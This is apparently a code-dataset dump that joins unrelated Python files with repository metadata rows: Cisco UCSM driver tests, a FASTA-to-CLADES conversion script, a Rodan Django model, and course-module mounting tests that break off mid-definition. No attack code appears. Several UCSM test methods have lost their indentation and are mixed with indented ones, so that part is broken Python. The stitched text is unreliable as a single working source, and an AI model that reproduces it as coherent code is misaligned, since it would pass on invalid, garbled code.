            handle, PORT_PROFILE_1, UCSM_IP_ADDRESS_1)
        # Failed delete results in entry being created in the PP delete table
        # so the delete can be retried later.
        self.assertTrue(self.ucsm_driver.ucsm_db.has_port_profile_to_delete(
            PORT_PROFILE_1, UCSM_IP_ADDRESS_1))
def test_add_sp_template_config_to_db(self):
"""Verifies the SP template dict has been created properly."""
host_id = HOST1
ucsm_ip = UCSM_IP_ADDRESS_1
sp_template_with_path = "/org-root/test/ls-SP-Test"
sp_template_info = sp_template_with_path.rsplit('/', 1)
self.ucsm_config.update_sp_template_config(host_id, ucsm_ip,
sp_template_with_path)
self.assertIsNotNone(
self.ucsm_config.get_sp_template_for_host(host_id))
self.assertEqual(sp_template_info[1],
self.ucsm_config.get_sp_template_for_host(host_id))
self.assertEqual(sp_template_info[0],
self.ucsm_config.get_sp_template_path_for_host(host_id))
def test_get_ucsm_ip_for_host_success(self):
"""Verfies that ucsm_ip to Service Profile mapping is successful."""
host_id = HOST1
ucsm_ip = UCSM_IP_ADDRESS_1
sp_template_with_path = "/org-root/test/ls-SP-Test"
self.ucsm_config.update_sp_template_config(host_id, ucsm_ip,
sp_template_with_path)
self.assertEqual(ucsm_ip, self.ucsm_driver.get_ucsm_ip_for_host(
host_id))
def test_get_ucsm_ip_for_host_failure(self):
"""Tests that case where UCSM does not control this host."""
def new_learn_sp_and_template_for_host(mech_instance, host_id):
return None
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'_learn_sp_and_template_for_host',
new=new_learn_sp_and_template_for_host).start()
self.assertIsNone(self.ucsm_driver.get_ucsm_ip_for_host('Hostname3'))
    def test_learn_sp_and_template_for_host_exp(self):
        """Tests case where reading config from UCSM generates exception."""
        host_id = HOST1
        # A bare Mock handle presumably makes the UCSM query return
        # unusable data, which the driver surfaces as UcsmConfigReadFailed.
        def mocked_connect(self, ucsm_ip):
            handle = mock.Mock()
            return handle
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'ucs_manager_connect',
                          new=mocked_connect).start()
        self.assertRaises(exceptions.UcsmConfigReadFailed,
                          self.ucsm_driver._learn_sp_and_template_for_host,
                          host_id)
    def test_learn_sp_and_template_for_host_error(self):
        """Tests case where learning config from UCSM gives diff host."""
        host_id = HOST1
        # The handle reports HOST2, which does not match the host being
        # learned, so the driver should learn nothing and return None.
        def mocked_connect(self, ucsm_ip):
            handle = FakeUcsmHandle(PORT_PROFILE_1, FakeServer(HOST2))
            return handle
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'ucs_manager_connect',
                          new=mocked_connect).start()
        self.assertIsNone(
            self.ucsm_driver._learn_sp_and_template_for_host(host_id))
    def test_learn_sp_and_template_for_host_success(self):
        """Tests case where learning config from UCSM gives correct host."""
        host_id = HOST1
        expected_ucsm_ip = '2.2.2.2'
        # Only the expected UCSM returns a usable handle; every other IP
        # gets a handle whose class query is invalid.
        def mocked_connect(self, ucsm_ip):
            if ucsm_ip == expected_ucsm_ip:
                handle = FakeUcsmHandle()
            else:
                handle = FakeUcsmHandle(invalid_classid=True)
            return handle
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'ucs_manager_connect',
                          new=mocked_connect).start()
        actual_ucsm_ip = self.ucsm_driver._learn_sp_and_template_for_host(
            host_id)
        self.assertEqual(expected_ucsm_ip, actual_ucsm_ip)
        # Resetting the ucsm_host_dict value to what the other tests expect.
        self.ucsm_driver.ucsm_host_dict[HOST1] = '1.1.1.1'
def test_parsing_of_single_ucsm_config(self):
"""Verifies parsing of expected single UCSM config parameters."""
# Single UCSM config parameters.
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = "1.1.1.1"
cfg.CONF.ml2_cisco_ucsm.ucsm_username = "user1"
cfg.CONF.ml2_cisco_ucsm.ucsm_password = "password1"
cfg.CONF.ml2_cisco_ucsm.ucsm_virtio_eth_ports = ["eth0", "eth1"]
expected_parsed_virtio_eth_ports = ["/ether-eth0", "/ether-eth1"]
ucsm_config = conf.UcsmConfig()
username, password = ucsm_config.get_credentials_for_ucsm_ip(
cfg.CONF.ml2_cisco_ucsm.ucsm_ip)
self.assertEqual(username, cfg.CONF.ml2_cisco_ucsm.ucsm_username)
self.assertEqual(password, cfg.CONF.ml2_cisco_ucsm.ucsm_password)
virtio_port_list = ucsm_config.get_ucsm_eth_port_list(
cfg.CONF.ml2_cisco_ucsm.ucsm_ip)
self.assertEqual(expected_parsed_virtio_eth_ports,
virtio_port_list)
# Check to see that SSL certificate checking is set to True by default
self.assertTrue(cfg.CONF.ml2_cisco_ucsm.ucsm_https_verify)
def test_parsing_of_single_ucsm_vnic_template_config(self):
"""Verifies parsing of single UCSM vNIC Template config."""
# Single UCSM config parameters.
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = "1.1.1.1"
cfg.CONF.ml2_cisco_ucsm.ucsm_username = "user1"
cfg.CONF.ml2_cisco_ucsm.ucsm_password = "password1"
cfg.CONF.ml2_cisco_ucsm.ucsm_virtio_eth_ports = ["eth0", "eth1"]
cfg.CONF.ml2_cisco_ucsm.vnic_template_list = (
'physnet1:top-root:Test-VNIC1 '
'physnet2:org-root/org-Test-Sub:Test-VNIC2 '
'physnet3::Test-VNIC3')
# Expected values after parsing of config parametrs
expected_vnic_template1 = ('org-root/org-Test-Sub', 'Test-VNIC2')
expected_vnic_template2 = [
('top-root', 'Test-VNIC1'),
('org-root/org-Test-Sub', 'Test-VNIC2'),
('org-root', 'Test-VNIC3')
]
ucsm_config = conf.UcsmConfig()
ucsm_config.vnic_template_dict = {}
# Verify parsing of VNIC Template config
self.assertTrue(ucsm_config.is_vnic_template_configured())
vnic_template1 = ucsm_config.get_vnic_template_for_physnet(
cfg.CONF.ml2_cisco_ucsm.ucsm_ip, "physnet2")
self.assertEqual(expected_vnic_template1, vnic_template1)
vnic_template2 = ucsm_config.get_vnic_template_for_ucsm_ip(
cfg.CONF.ml2_cisco_ucsm.ucsm_ip)
self.assertEqual(expected_vnic_template2, vnic_template2)
vnic_template_path, vnic_template = (
ucsm_config.get_vnic_template_for_physnet("1.1.1.1",
"physnet1"))
vnic_templ_full_path1 = (vnic_template_path +
const.VNIC_TEMPLATE_PREFIX + str(vnic_template))
expected_vnic_templ_full_path1 = "top-root/lan-conn-templ-Test-VNIC1"
self.assertEqual(expected_vnic_templ_full_path1,
vnic_templ_full_path1)
vnic_template_path, vnic_template = (
ucsm_config.get_vnic_template_for_physnet("1.1.1.1",
"physnet2"))
vnic_templ_full_path1 = (vnic_template_path +
const.VNIC_TEMPLATE_PREFIX + str(vnic_template))
expected_vnic_templ_full_path1 = (
"org-root/org-Test-Sub/lan-conn-templ-Test-VNIC2")
self.assertEqual(expected_vnic_templ_full_path1,
vnic_templ_full_path1)
vnic_template_path, vnic_template = (
ucsm_config.get_vnic_template_for_physnet("1.1.1.1",
"physnet3"))
vnic_templ_full_path1 = (vnic_template_path +
const.VNIC_TEMPLATE_PREFIX + str(vnic_template))
expected_vnic_templ_full_path1 = "org-root/lan-conn-templ-Test-VNIC3"
self.assertEqual(expected_vnic_templ_full_path1,
vnic_templ_full_path1)
def test_parsing_of_single_ucsm_sp_template_config(self):
"""Verifies parsing of single UCSM SP Template config."""
# Single UCSM config parameters.
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = "1.1.1.1"
cfg.CONF.ml2_cisco_ucsm.ucsm_username = "user1"
cfg.CONF.ml2_cisco_ucsm.ucsm_password = "password1"
cfg.CONF.ml2_cisco_ucsm.ucsm_virtio_eth_ports = ["eth0", "eth1"]
cfg.CONF.ml2_cisco_ucsm.sp_template_list = (
'SP_Template1_path:SP_Template1:Host11,Host12 '
'SP_Template2_path:SP_Template2:Host21,Host22')
ucsm_config = conf.UcsmConfig()
# Verify parsing of SP Template config
self.assertTrue(ucsm_config.is_service_profile_template_configured())
# Test all the utility methods to glean information
# from sp_template_dict
expected_sp_template_path = "SP_Template1_path"
sp_template_path = ucsm_config.get_sp_template_path_for_host("Host11")
self.assertEqual(expected_sp_template_path, sp_template_path)
expected_sp_template = "SP_Template1"
sp_template = ucsm_config.get_sp_template_for_host("Host12")
self.assertEqual(expected_sp_template, sp_template)
expected_ucsm_ip = "1.1.1.1"
ucsm_ip = ucsm_config.get_ucsm_ip_for_sp_template_host("Host21")
self.assertEqual(expected_ucsm_ip, ucsm_ip)
expected_sp_template_list = [
('1.1.1.1', 'SP_Template2_path', 'SP_Template2'),
('1.1.1.1', 'SP_Template1_path', 'SP_Template1'),
]
sp_template_list = ucsm_config.get_sp_template_list_for_ucsm("1.1.1.1")
for entry in expected_sp_template_list:
self.assertIn(entry, sp_template_list)
expected_sp_template_list = []
sp_template_list = ucsm_config.get_sp_template_list_for_ucsm("2.2.2.2")
self.assertEqual(expected_sp_template_list, sp_template_list)
| 41.944862
| 79
| 0.650056
|
4a07da572cce21f339ac55c7a21fc0797da17e24
| 5,162
|
py
|
Python
|
multifasta2clades.py
|
tkchafin/file_converters
|
635beec418bd4593bb6f724e289ab939633c00c3
|
[
"MIT"
] | 1
|
2020-11-17T06:19:29.000Z
|
2020-11-17T06:19:29.000Z
|
multifasta2clades.py
|
tkchafin/file_converters
|
635beec418bd4593bb6f724e289ab939633c00c3
|
[
"MIT"
] | 2
|
2018-11-03T20:50:31.000Z
|
2021-09-15T15:18:11.000Z
|
multifasta2clades.py
|
tkchafin/file_converters
|
635beec418bd4593bb6f724e289ab939633c00c3
|
[
"MIT"
] | 1
|
2020-06-22T20:51:46.000Z
|
2020-06-22T20:51:46.000Z
|
#!/usr/bin/env python
# Script written by Bradley T. Martin, PhD Candidate, University of Arkansas.
# Please report any issues or bugs to btm002@email.uark.edu
import argparse # parse command-line arguments.
import os # needed for listing directory of fasta files.
import sys # used for exiting if conditions not met.
from Bio import AlignIO # to read fasta files.
def main():
    """Convert a directory of FASTA alignments into one CLADES input file.

    Every individual listed in the popmap appears in every locus block;
    individuals missing from a given alignment are padded with '-' runs.
    """
    args = Get_Arguments()  # uses argparse.
    popmap = read_popmap(args.popmap)
    indcount = len(popmap)
    with open(args.outfile, "w") as fout:
        fout.write("\n\n")  # Write two empty lines at beginning of file.
    for filename in os.listdir(args.dir):
        fas = read_fasta(filename, args.dir)  # Uses biopython AlignIO
        alnLen = fas.get_alignment_length()  # Gets max length of each alignment
        ninds = len(fas)  # Gets number of sequences
        # NOTE(review): ninds is computed but unused; the header uses the
        # popmap size so padded missing individuals are counted.
        header = "{} {}".format(indcount, alnLen)  # Make header for each locus.
        indlist = list()
        with open(args.outfile, "a") as fout:
            fout.write(header + "\n")
            # If present in popmap: get list of individuals
            new_popmap = {k.id: popmap[k.id] for k in fas if k.id in popmap}
            ind_id_list = [record.id for record in fas]
            # For finding individual missing from alignment
            missing_inds = dict()
            for k, v in popmap.items():
                if k not in ind_id_list:
                    missing_inds[k] = v
            indlist = list(("{}^{}".format(key, value) for key, value in new_popmap.items()))
            missing_ind_list = list(("{}^{}".format(key, value) for key, value in missing_inds.items()))
            # Makes new dictionary in format of ind1^pop1
            new_fasta_dict = dict()
            for ind in indlist:
                first = ind.split("^")
                for record in fas:
                    if first[0] == record.id:
                        new_fasta_dict[ind] = str(record.seq)
            # Write all dashes for missing individuals. length = alnLen
            missing_seq = repeat_to_length("-", alnLen)
            missing_dict = {k: missing_seq for k in missing_ind_list}
            # Add individuals with all missing data to dictionary
            new_fasta_dict.update(missing_dict)
            # Sorted so output order is deterministic across runs.
            for key in sorted(new_fasta_dict):
                fout.write("{}\t{}\n".format(key, new_fasta_dict[key]))
            fout.write("\n\n")
def repeat_to_length(string_to_expand, length):
    """Return *string_to_expand* repeated and truncated to *length* chars.

    Bug fix: the original used true division (``/``), which yields a float
    in Python 3 and makes ``str * float`` raise TypeError; integer floor
    division (``//``) restores the intended behavior. An empty input now
    returns "" instead of raising ZeroDivisionError.
    """
    if not string_to_expand:
        return ""
    return (string_to_expand * (length // len(string_to_expand) + 1))[:length]
def read_popmap(filename):
    """
    Parse a two-column whitespace-delimited popmap file.
    Blank lines are skipped; later duplicate IDs overwrite earlier ones.
    Input: filename
    Returns: dictionary[col1] = col2.
    """
    with open(filename, "r") as handle:
        rows = [line.split() for line in handle if line.strip()]
    return {fields[0]: fields[1] for fields in rows}
def read_fasta(filename, mydir):
    """
    Reads fasta file using biopython's AlignIO.
    Used in generator with directory of fasta files.
    Inputs: filename, directory of input files.
    Returns: file contents (a MultipleSeqAlignment).
    """
    # Remove forward slash if present.
    if mydir.endswith("/"):
        mydir = mydir[:-1]
    mypath = str(mydir) + "/" + str(filename)
    # Bug fix: the original passed an open() handle that was never closed,
    # leaking one file descriptor per alignment. Use a context manager so
    # the handle is closed as soon as the alignment is parsed.
    with open(mypath) as handle:
        return AlignIO.read(handle, 'fasta')  # from biopython
def Get_Arguments():
"""
Parse command-line arguments. Imported with argparse.
Returns: object of command-line arguments.
"""
parser = argparse.ArgumentParser(description="Converts directory of FASTA files to input file for CLADES for species delimitation", add_help=False)
required_args = parser.add_argument_group("Required Arguments")
optional_args = parser.add_argument_group("Optional Arguments")
## Required Arguments
required_args.add_argument("-d", "--dir",
type=str,
required=True,
help="Specify directory containing only input FASTA files.")
required_args.add_argument("-o", "--outfile",
type=str,
required=True,
help="String; Specify output CLADES filename")
required_args.add_argument("-p", "--popmap",
type=str,
required=True,
help="String; Specify two-column tab-delimited popmap file: IndID\tPopID; no header line.")
optional_args.add_argument("-h", "--help",
action="help",
help="Displays this help menu")
# If no arguments specified print help and die.
if len(sys.argv)==1:
print("\nExiting because no command-line options were called.\n")
parser.print_help(sys.stderr)
sys.exit(1)
args = parser.parse_args()
return args
if __name__ == "__main__":
main()
| 37.955882
| 151
| 0.591437
|
4a07dadf8d4d47a51dde0ead2a3a18540ebd394d
| 2,228
|
py
|
Python
|
rodan/models/input.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 31
|
2015-01-06T17:23:45.000Z
|
2022-03-30T02:46:16.000Z
|
rodan/models/input.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 258
|
2015-01-02T19:34:57.000Z
|
2022-01-19T16:34:21.000Z
|
rodan/models/input.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 8
|
2015-08-19T16:09:31.000Z
|
2021-10-03T23:46:46.000Z
|
from django.db import models
from rodan.models.inputporttype import InputPortType
import uuid
class Input(models.Model):
"""
Links a `RunJob` to one of its input `Resource`s. There must be
one `Input` for each `InputPort` of the `WorkflowJob`.
**Fields**
- `uuid`
- `input_port` -- a reference to an `InputPort`. It should be set to None when the
original `InputPort` is deleted.
- `input_port_type_name` -- a string containing the name of the `InputPortType`.
- `resource` -- a field containing a reference to the precise `Resource` that
this `RunJob` will act on.
- `resource_list` -- a field containing a reference to the precise `ResourceList` that
this `RunJob` will act on.
- `run_job` -- a reference to the `RunJob` that will be executed.
**Properties**
- `input_port_type` -- the corresponding `InputPortType` object.
"""
class Meta:
app_label = "rodan"
permissions = (("view_input", "View Input"),)
uuid = models.UUIDField(primary_key=True, editable=False, default=uuid.uuid4)
input_port = models.ForeignKey(
"rodan.InputPort",
related_name="inputs",
blank=True,
null=True,
on_delete=models.SET_NULL,
db_index=True,
)
input_port_type_name = models.CharField(max_length=255, db_index=True)
resource = models.ForeignKey(
"rodan.Resource",
related_name="inputs",
on_delete=models.PROTECT,
db_index=True,
null=True,
blank=True,
)
resource_list = models.ForeignKey(
"rodan.ResourceList",
related_name="inputs",
on_delete=models.PROTECT,
db_index=True,
null=True,
blank=True,
)
run_job = models.ForeignKey(
"rodan.RunJob", related_name="inputs", on_delete=models.CASCADE, db_index=True
)
def __unicode__(self):
return u"<Input {0}>".format(str(self.uuid))
@property
def input_port_type(self):
try:
return InputPortType.objects.get(
job__name=self.run_job.job_name, name=self.input_port_type_name
)
except InputPortType.DoesNotExist:
return None
| 30.520548
| 90
| 0.635099
|
4a07db19fb38a0ae86fefce2f12e8482e213f03d
| 17,783
|
py
|
Python
|
test/test_individual_module_mounting_backend.py
|
nus-mtp/another-cs-study-planner
|
02b52871a34f580b779ede08750f2d4e887bcf65
|
[
"MIT"
] | 1
|
2017-04-30T17:59:08.000Z
|
2017-04-30T17:59:08.000Z
|
test/test_individual_module_mounting_backend.py
|
nus-mtp/another-cs-study-planner
|
02b52871a34f580b779ede08750f2d4e887bcf65
|
[
"MIT"
] | 87
|
2017-02-13T09:06:13.000Z
|
2017-04-14T09:23:08.000Z
|
test/test_individual_module_mounting_backend.py
|
nus-mtp/another-cs-study-planner
|
02b52871a34f580b779ede08750f2d4e887bcf65
|
[
"MIT"
] | 1
|
2017-04-11T05:26:00.000Z
|
2017-04-11T05:26:00.000Z
|
'''
test_individual_module_mounting_backend.py
Contains test cases related to backened functions for displaying an individual module's mounting
'''
from nose.tools import assert_equal, assert_true
from components.handlers.module_overview import ViewMod
from components.handlers.module_view_in_ay_sem import IndividualModule
from components import model
class TestCode(object):
'''
This class runs the test cases related to displaying an individual module's mounting.
'''
def __init__(self):
self.module_overview_handler = None
self.current_ay = None
self.next_ay = None
def get_next_ay(self, ay):
'''
Return the AY that comes after the current AY
'''
ay = ay.split(' ')[1].split('/')
return 'AY ' + str(int(ay[0])+1) + '/' + str(int(ay[1])+1)
def setUp(self):
'''
Add dummy modules and mountings into database
'''
self.module_overview_handler = ViewMod()
self.mounting_view_handler = IndividualModule()
self.current_ay = model.get_current_ay()
self.next_ay = self.get_next_ay(self.current_ay)
# Dummy modules
model.add_module('BB1001', 'Dummy Module 1',
'This module is mounted in both sems in both AYs.', 1, 'Active')
model.add_module('BB1002', 'Dummy Module 2',
'This module is mounted in sem 1 only, in both AYs.', 2, 'Active')
model.add_module('BB1003', 'Dummy Module 3',
'This module is mounted in sem 2 only, in both AYs.', 3, 'Active')
model.add_module('BB1004', 'Dummy Module 4',
'This module is not mounted in any sem, in both AYs.', 4, 'Active')
# Dummy fixed mountings
model.add_fixed_mounting('BB1001', self.current_ay+' Sem 1', 10)
model.add_fixed_mounting('BB1001', self.current_ay+' Sem 2', 20)
model.add_fixed_mounting('BB1002', self.current_ay+' Sem 1', 30)
model.add_fixed_mounting('BB1003', self.current_ay+' Sem 2', 40)
# Dummy tentative mountings
model.add_tenta_mounting('BB1001', self.next_ay+' Sem 1', 10)
model.add_tenta_mounting('BB1001', self.next_ay+' Sem 2', 20)
model.add_tenta_mounting('BB1002', self.next_ay+' Sem 1', 30)
model.add_tenta_mounting('BB1003', self.next_ay+' Sem 2', 40)
def tearDown(self):
'''
Clean up the database after all test cases are ran
'''
model.delete_fixed_mounting('BB1001', self.current_ay+' Sem 1')
model.delete_fixed_mounting('BB1001', self.current_ay+' Sem 2')
model.delete_fixed_mounting('BB1002', self.current_ay+' Sem 1')
model.delete_fixed_mounting('BB1003', self.current_ay+' Sem 2')
model.delete_tenta_mounting('BB1001', self.next_ay+' Sem 1')
model.delete_tenta_mounting('BB1001', self.next_ay+' Sem 2')
model.delete_tenta_mounting('BB1002', self.next_ay+' Sem 1')
model.delete_tenta_mounting('BB1003', self.next_ay+' Sem 2')
model.delete_module('BB1001')
model.delete_module('BB1002')
model.delete_module('BB1003')
model.delete_module('BB1004')
def test_mounted_in_both_sems(self):
'''
Tests that a module that is mounted in both sems in both AYs
will have the mounting values '1' and '1' for both AYs
'''
test_module_code = "BB1001"
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
fixed_mounting_plan = self.module_overview_handler.fixed_mounting_plan
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(fixed_mounting_plan) == 2)
assert_true(len(tenta_mounting_plan) > 0)
fixed_sem_1_mounting_value = fixed_mounting_plan[0][1]
fixed_sem_2_mounting_value = fixed_mounting_plan[1][1]
fixed_sem_1_quota = fixed_mounting_plan[0][2]
fixed_sem_2_quota = fixed_mounting_plan[1][2]
assert_equal(fixed_sem_1_mounting_value, 1)
assert_equal(fixed_sem_2_mounting_value, 1)
assert_equal(fixed_sem_1_quota, 10)
assert_equal(fixed_sem_2_quota, 20)
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, 1)
assert_equal(tenta_sem_2_mounting_value, 1)
assert_equal(tenta_sem_1_quota, 10)
assert_equal(tenta_sem_2_quota, 20)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 10)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 20)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 10)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 20)
def test_mounted_in_sem_1_only(self):
'''
Tests that a module that is mounted in sem 1 only, in both AYs,
will have the mounting values '1' and '-1' for both AYs
'''
test_module_code = "BB1002"
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
fixed_mounting_plan = self.module_overview_handler.fixed_mounting_plan
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(fixed_mounting_plan) == 2)
assert_true(len(tenta_mounting_plan) > 0)
fixed_sem_1_mounting_value = fixed_mounting_plan[0][1]
fixed_sem_2_mounting_value = fixed_mounting_plan[1][1]
fixed_sem_1_quota = fixed_mounting_plan[0][2]
fixed_sem_2_quota = fixed_mounting_plan[1][2]
assert_equal(fixed_sem_1_mounting_value, 1)
assert_equal(fixed_sem_2_mounting_value, -1)
assert_equal(fixed_sem_1_quota, 30)
assert_equal(fixed_sem_2_quota, '-')
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, 1)
assert_equal(tenta_sem_2_mounting_value, -1)
assert_equal(tenta_sem_1_quota, 30)
assert_equal(tenta_sem_2_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 30)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 30)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
def test_mounted_in_sem_2_only(self):
'''
Tests that a module that is mounted in sem 2 only, in both AYs,
will have the mounting values '-1' and '1' for both AYs
'''
test_module_code = "BB1003"
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
fixed_mounting_plan = self.module_overview_handler.fixed_mounting_plan
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(fixed_mounting_plan) == 2)
assert_true(len(tenta_mounting_plan) > 0)
fixed_sem_1_mounting_value = fixed_mounting_plan[0][1]
fixed_sem_2_mounting_value = fixed_mounting_plan[1][1]
fixed_sem_1_quota = fixed_mounting_plan[0][2]
fixed_sem_2_quota = fixed_mounting_plan[1][2]
assert_equal(fixed_sem_1_mounting_value, -1)
assert_equal(fixed_sem_2_mounting_value, 1)
assert_equal(fixed_sem_1_quota, '-')
assert_equal(fixed_sem_2_quota, 40)
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, -1)
assert_equal(tenta_sem_2_mounting_value, 1)
assert_equal(tenta_sem_1_quota, '-')
assert_equal(tenta_sem_2_quota, 40)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 40)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 40)
def test_not_mounted(self):
'''
Tests that a module that is not mounted in any sem, in both AYs,
will have the mounting values '-1' and '-1' for both AYs
'''
test_module_code = "BB1004"
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
fixed_mounting_plan = self.module_overview_handler.fixed_mounting_plan
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(fixed_mounting_plan) == 2)
assert_true(len(tenta_mounting_plan) > 0)
fixed_sem_1_mounting_value = fixed_mounting_plan[0][1]
fixed_sem_2_mounting_value = fixed_mounting_plan[1][1]
fixed_sem_1_quota = fixed_mounting_plan[0][2]
fixed_sem_2_quota = fixed_mounting_plan[1][2]
assert_equal(fixed_sem_1_mounting_value, -1)
assert_equal(fixed_sem_2_mounting_value, -1)
assert_equal(fixed_sem_1_quota, '-')
assert_equal(fixed_sem_2_quota, '-')
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, -1)
assert_equal(tenta_sem_2_mounting_value, -1)
assert_equal(tenta_sem_1_quota, '-')
assert_equal(tenta_sem_2_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
def test_unmounted_from_sem_1(self):
'''
Tests that a module that is unmounted from sem 1
will have the tentative-mounting value of '0' for sem 1
'''
test_module_code = "BB1002"
model.delete_tenta_mounting(test_module_code, self.next_ay+' Sem 1')
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(tenta_mounting_plan) > 0)
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
assert_equal(tenta_sem_1_mounting_value, 0)
assert_equal(tenta_sem_1_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 30)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 0)
assert_equal(self.mounting_view_handler.quota, '-')
model.add_tenta_mounting(test_module_code, self.next_ay+' Sem 1', 30)
def test_unmounted_from_sem_2(self):
'''
Tests that a module that is unmounted from sem 2
will have the tentative-mounting value of '0' for sem 2
'''
test_module_code = "BB1003"
model.delete_tenta_mounting(test_module_code, self.next_ay+' Sem 2')
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(tenta_mounting_plan) > 0)
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_2_mounting_value, 0)
assert_equal(tenta_sem_2_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 40)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 0)
assert_equal(self.mounting_view_handler.quota, '-')
model.add_tenta_mounting(test_module_code, self.next_ay+' Sem 2', 40)
def test_unmounted_from_both_sems(self):
'''
